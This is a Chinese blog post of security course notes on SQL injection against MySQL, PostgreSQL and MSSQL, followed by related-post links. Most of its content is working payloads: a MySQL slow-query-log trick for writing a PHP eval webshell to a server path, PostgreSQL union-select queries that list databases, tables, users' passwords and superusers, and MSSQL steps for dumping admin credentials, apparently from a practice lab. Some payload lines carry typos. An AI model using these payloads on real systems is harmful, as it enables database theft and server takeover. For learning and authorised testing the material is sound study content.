小迪安全25WEB 攻防-通用漏洞&SQL 读写注入&MYSQL&MSSQL&PostgreSQL

最新推荐文章于 2024-07-02 17:20:39 发布
最新推荐文章于 2024-07-02 17:20:39 发布
阅读量1k 收藏 21
点赞数 23
文章标签: web安全 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73760178/article/details/136150928
版权
本文详细介绍了SQL注入在不同数据库系统(如MySQL、MSSQL和PostgreSQL)中的高权限注入点,包括如何利用SQL语句获取敏感信息、读写文件,以及针对MSSQL的高级权限操作,同时提供了手工注入测试方法和实例。
摘要由CSDN通过智能技术生成

 

 #知识点: 

1、SQL 注入-MYSQL 数据库 

2、SQL 注入-MSSQL(SQL server) 数据库 

3、SQL 注入-PostgreSQL 数据库 

#详细点: 

Access 无高权限注入点-只能猜解,还是暴力猜解 

         因为access的数据库是独立存在的,不存在统一管理

对账号密码进行猜解,此时只是获取到后台的操作权限,若要获取到服务器或网站等高级权限,需要进一步的提权操作

 

MYSQL,PostgreSQL,MSSQL 高权限注入点-可升级读写执行等 

 

 

操作一:MYSQL——root高权限读写注入

通过mysql对本地文件的读取:一般读取相关敏感文件

4845a8a1b8714250bb433a13432b65f7.png

 对本地文件的写

418165f821d24958a81df8139f6a53b9.png

419d533c0da6482f83f58e38bbf1090f.png 

 1bcf885d855a48ebb7076bf1d5127062.png

 那么对于读写文件针对的则是敏感文件,敏感文件的获取:

1.Phpinfo

5a37c6f61b13427593d8bd9013a57380.png

698aa9c351024b6a8fb81cd82d878b85.png 

 2.报错

e987e2a3684a4b3ca96850ee42b4bdc9.png

acd2981c7ee74b808af8f9eea62a23a7.png 

连接菜刀,登入后台


3.字典
不知道路径。就不断爆破虚构路径

 

无法写入——配置讲解:
My.ini:

4928ea794e5047a2a26631be244f4ca3.png—对路径进行操作限制,只能访问到值以内的路径

 

突破:注入需要支持SQL环境,若没有则使用第三方phpmyadmin或能够直接连上对方数据库进行绕过

 

1.利用SQL语句,开启漫游日志:

Set global slow_query_log=1;——开启日志

Set global slow_query_log_file=’shell路径’;——令日志内容写入知指定路径

Select ‘<?php eval()$_GET[A]?>’ or Slepp(10);——在指定文键中写入paylioad,菜刀后台连接

 

2.进入phpmyadmin:进行修改

 

操作二:PostgreSQL-高权限读写注入

SQL手工注入漏洞测试PostgreSQL数据库:在工具不行的情况下,进行手工注入

-测列数: 

order by 4 

and 1=2 union select null,null,null,null 

-测显位:第 2,3 

and 1=2 union select 'null',null,null,null 错误 

and 1=2 union select null,'null',null,null 正常 

and 1=2 union select null,null,'null',null 正常 

and 1=2 union select null,null,null,'null' 错误 

 

-获取信息: 

and 1=2 UNION SELECT null,version(),null,null 

and 1=2 UNION SELECT null,current_user,null,null 

and 1=2 union select null,current_database(),null,null 

 

-获取数据库名: 

and 1=2 union select null,string_agg(datname,','),null,null from 

pg_database 

 

-获取表名: 

and 1=2 union select null,string_agg(tablename,','),null,null 

from pg_tables where schemaname='public' 

and 1=2 union select null,string_agg(relname,','),null,null 

from pg_stat_user_tables 

 

-获取列名: 

and 1=2 union select null,string_agg(column_name,','),null,null 

from information_schema.columns where table_name='reg_users' 

-获取数据: 

and 1=2 union select null,string_agg(name,’,’),string_agg(password,’,’),null from reg_users  

 

-查询高级用户

and 1=2 union select null,string_agg(username,’,’),null,null from pg_user where usesuper IS TRuE  

 

高级权限文件读写操作——参考:https://www.freebuf.com/sectool/24937.heml

 

操作三:mssql-高级权限文件修改

 

判断注入点:点击链接 

判断注入类型:看看是整型还是字符型(and 1=1、and 1=2) 

判断列数:order by n 

判断显示位:union all select NULL,NULL...... 

爆数据库:?id=2 and 1=2 union all select 1,db_name(),'3',4 

爆表:?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4 

爆字段:?id=2 and 1=2 union all select 1,(select username from manage),(select password from manage where username in ('admin_mz')),4 8、MD5解密 

9、登录,获取KEY

 

 

yiqiqukanhaiba
关注
  • 23
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小迪安全学习笔记】WEB漏洞-SQL注入MYSQL注入
Akrios的博客
05-31 514
MYSQL注入中首要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击者还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 高权限注入及低权限注入 root在MYSQL数据库中属于最高权限,除root之外其他都简称为为普通用户权限 不是root权限获取不到数据库名 跨库查询及应用思路 information_schema表特性,记录库名,表名,列名对应表 通过selec
小迪安全day12】WEB 漏洞——SQL 注入
RichUee的博客
12-04 902
WEB 漏洞-SQL 注入在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
小迪sql注入.md
12-11
小迪sql注入.md
25WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
qq_55202378的博客
12-31 1371
Access无高权限注入点——只能猜解,而且是暴力猜解;MYSQLPostgreSQL,MSSQL(SQL server)高权限注入点——可升级读写(文件)、(命令)执行等。
SQL注入【2】——通用漏洞/SQL读写注入/MYSQL/MSSQL/PostgreSQL
最新发布
weixin_42090431的博客
07-02 663
select '
day25WEB攻防-通用漏洞&SQL读写注入&MYSQL&SqlServer&PostgreSQL
m0_69583059的博客
01-15 1094
Access无高权限注入点,只能猜解,还是暴力猜解MYSQLPostgreSQL,MSSQL高权限注入点可以升级读写执行等,高权限注入可以通过写入后门或者读取相关配置文件获取当前网站的相关权限,不需要通过一步一步猜解数据,当然这只是里理论,在实际环境中,可能会因为数据库的某些设置或者防护导致无法读写注入,如果能绕过当然是最好的,如果不能绕过那么我们只能乖乖的一步一步猜解 读取文件:union select load_file('读取路径'),2,3 写入文件:union select '写入信息',2,
MySQL & PostgreSQL管道
01-27
sql allows you to pipe STDIN (hopefully containing SQL) to one or more pre-configured MySQL or PostgreSQL databases output comes out in \t-separated format, allowing further piping (e.g. works really ...
清晰:AdonisJS官方SQL ORM。 支持PostgreSQLMySQL,MSSQL,Redshift,SQLite等
01-30
本文将深入探讨Lucid的功能、特性以及如何与各种SQL数据库(如PostgreSQLMySQL,MSSQL,Redshift和SQLite)配合使用。 首先,让我们了解ORM的概念。ORM是一种编程技术,它允许开发者使用面向对象的语言来操作...
suql:Sugar SQL MySQL PostgreSQL PostgreSQL MSSQL Oracle NoSQL
02-04
SQL这是什么? SuQL是SQL的语法糖。这是如何运作的? 点击下面的图片以查看YouTube上的整个演示。你为什么需要这个? 一次编写查询,用于每个DBMS。 编写易于阅读和编写的查询。 自行扩展SuQL语法。 SQL不是限制。...
jasync-sql:用Kotlin编写的Java和Kotlin MySQLPostgreSQL异步数据库驱动程序
01-30
是一个简单的,基于Netty,异步,高性能和可靠的数据库驱动程序,用于用Kotlin编写的PostgreSQLMySQL。 入门 // Connection to MySQL DB Connection connection = MySQLConnectionBuilder . createConnection...
mysqlpostgresql漏洞修复包
02-02
mysql-connector-java-8.0.19版本修复包:mysql-connector-java-8.0.27.jar postgresql--42.1.4版本修复包:postgresql-42.2.26.jar
MSSQL手工注入并提权
07-24
MSSQL手工注入并提权
B站小迪安全笔记第12天-SQL注入之简要注入
m0_61530426的博客
07-20 663
B站小迪安全笔记
B站小迪安全笔记第十三天-SQL注入MYSQL注入
m0_61530426的博客
07-29 393
B站小迪安全笔记
小迪安全|第12天:SQL注入之简要SQL注入
欢迎相互探讨交流知识呀~
11-15 1108
笔记
小迪安全》第18天 SQL注入:堆叠注入,WAF绕过注入
m0_56250796的博客
05-06 279
很多网站后台权限划分时常见以组划分,插入数据时注意即可新建管理员权限的新账号。比如 dedecms 中的 dede_member 表,有 mtype 列,值为 'admin' 则为管理员。类似 Linux 文件系统的权限划分。
(2020上半年第7天(SQL注入-MYSQL注入(SQL注入2/10)))小迪网络安全笔记
u013630181的博客
06-18 480
操作①
小迪教程第五天——Php+mysql注入(文件读取,文件导出)
仲夏
10-16 1486
1、Mysql数据库最高权限用户:root注入点不同的权限用户是取决于连接数据库时的用户2、小实验:测试mysql不同用户文件操作权限测试root的文件操作权限 Root用户权限可以执行sql语句对文件进行读写操作 有读取权限: 有写入权限: 测试test普通用户的文件操作权限 Test普通用户权限不可以执行sql语句对文件进行读写操作3、符号问题,编码问题, 路径问题符号问题: 使
小迪教程第四天——Php+mysql注入
仲夏
10-15 595
Access注入属于暴力猜解 Mysql5.0以上注入属于有根据的(information_schema数据库) Mysql5.0以下注入属于暴力猜解Access数据结构Access数据库 表名 列名 数据Mysql数据结构Mysql数据库 a数据库 表名
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值